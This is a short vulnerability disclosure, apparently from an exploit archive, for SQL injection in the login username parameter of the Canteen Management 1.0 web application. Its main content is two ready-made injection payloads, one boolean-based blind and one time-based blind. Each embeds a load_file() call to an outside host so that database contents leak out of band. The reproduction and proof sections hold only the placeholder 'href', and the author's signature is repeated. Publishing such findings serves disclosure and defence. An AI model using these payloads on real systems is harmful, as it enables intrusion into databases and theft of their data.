Canteen Management 1.0-2022 SQL Injection

Title: Canteen-Management1.0-2022 SQLi

Author: nu11secur1ty

Date: 10.04.2022

Vendor: https://www.mayurik.com/

Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true

Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi

Description:

The username parameter from Canteen-Management1.0-2022 appears to be
vulnerable to SQL injection attacks.
The malicious user can attack remotely this system by using this
vulnerability to steal all information from the database of this
system.

STATUS: HIGH Vulnerability

[+]Payload:

---  
Parameter: username (POST)  
    Type: boolean-based blind  
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
    Payload: username=UvIiDwEB'+(select  
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''  
OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=

    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: username=UvIiDwEB'+(select  
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''  
AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND  
'awEr'='awEr&password=h5F!l8j!Y6&login=  
---  

Reproduce:

href

Proof and Exploit:

href

–
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty http://nu11secur1ty.com/

–
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty http://nu11secur1ty.com/